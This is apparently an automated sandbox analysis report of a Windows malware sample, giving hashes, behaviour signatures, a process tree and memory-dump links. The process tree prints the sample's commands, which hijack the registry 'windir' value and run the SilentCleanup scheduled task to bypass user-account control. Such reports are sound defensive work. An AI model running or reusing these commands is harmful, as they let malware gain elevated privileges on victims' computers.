Overview

overview

10

Static

static

c27cad4a8a...90.exe

windows7_x64

10

c27cad4a8a...90.exe

windows10_x64

6

Analysis

  • max time kernel
    149s
  • max time network
    135s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    07-07-2020 06:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c27cad4a8a936c75f677d0a14fd58590.exe

  • Size

    1.2MB

  • MD5

    c27cad4a8a936c75f677d0a14fd58590

  • SHA1

    1f4614b6d5553af0ea857a907885048808cc8e48

  • SHA256

    db4bb50f2327328901cc6fff050acb653a059dc905917dcefedccbd8154c13ce

  • SHA512

    b094e2ca78b25bd9c4eec4f4bf30e767db9d52c9ff6b7f54f3014988ac3d9cc89df86fd1d4dd2eeac1bd75d2fba91df79fb6a7d63ffe405ea1864805ffdd7e13

Score
6/10
persistence

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 511 IoCs
  • Adds Run entry to start application 2 TTPs 1 IoCs
    persistence
  • Modifies registry key 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c27cad4a8a936c75f677d0a14fd58590.exe
    "C:\Users\Admin\AppData\Local\Temp\c27cad4a8a936c75f677d0a14fd58590.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Adds Run entry to start application
    PID:3544
    • C:\Windows\SysWOW64\TapiUnattend.exe
      "C:\Windows\System32\TapiUnattend.exe"
      2⤵
        PID:2488
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
          3⤵
            PID:592
            • C:\Windows\SysWOW64\reg.exe
              reg delete hkcu\Environment /v windir /f
              4⤵
              • Modifies registry key
              PID:1820
            • C:\Windows\SysWOW64\reg.exe
              reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
              4⤵
              • Modifies registry key
              PID:3264
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
              4⤵
                PID:1260
              • C:\Windows\SysWOW64\reg.exe
                reg delete hkcu\Environment /v windir /f
                4⤵
                • Modifies registry key
                PID:3444
          • C:\Program Files (x86)\internet explorer\ieinstal.exe
            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
            2⤵
              PID:1008

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Public\Natso.bat
            Download Submit

          • memory/592-126-0x0000000000000000-mapping.dmp

            Download

          • memory/1260-130-0x0000000000000000-mapping.dmp

            Download

          • memory/1820-128-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-62-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-55-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-2-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-3-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-4-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-5-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-6-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-7-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-8-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-9-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-10-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-11-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-12-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-13-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-14-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-15-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-16-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-17-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-18-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-19-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-20-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-21-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-22-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-23-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-24-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-25-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-26-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-27-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-28-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-29-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-30-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-31-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-32-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-33-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-34-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-35-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-36-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-37-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-38-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-39-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-40-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-41-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-42-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-43-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-44-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-45-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-46-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-47-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-48-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-49-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-50-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-51-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-52-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-53-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-54-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-63-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-56-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-57-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-58-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-59-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-60-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-61-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-121-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-1-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-82-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-65-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-66-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-67-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-68-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-69-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-70-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-71-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-72-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-73-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-74-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-75-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-76-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-77-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-78-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-79-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-80-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-81-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-64-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-83-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-84-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-85-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-86-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-87-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-88-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-89-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-90-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-91-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-92-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-93-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-94-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-95-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-96-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-97-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-98-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-99-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-100-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-101-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-102-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-103-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-104-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-105-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-106-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-107-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-108-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-109-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-110-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-111-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-112-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-113-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-114-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-115-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-116-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-117-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-118-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-119-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-120-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-0-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-122-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-123-0x0000000000000000-mapping.dmp

            Download

          • memory/2488-125-0x0000000000000000-mapping.dmp

            Download

          • memory/3264-129-0x0000000000000000-mapping.dmp

            Download

          • memory/3444-131-0x0000000000000000-mapping.dmp

            Download

          • memory/3544-124-0x0000000010410000-0x0000000010450000-memory.dmp

            Filesize

            256KB

            Download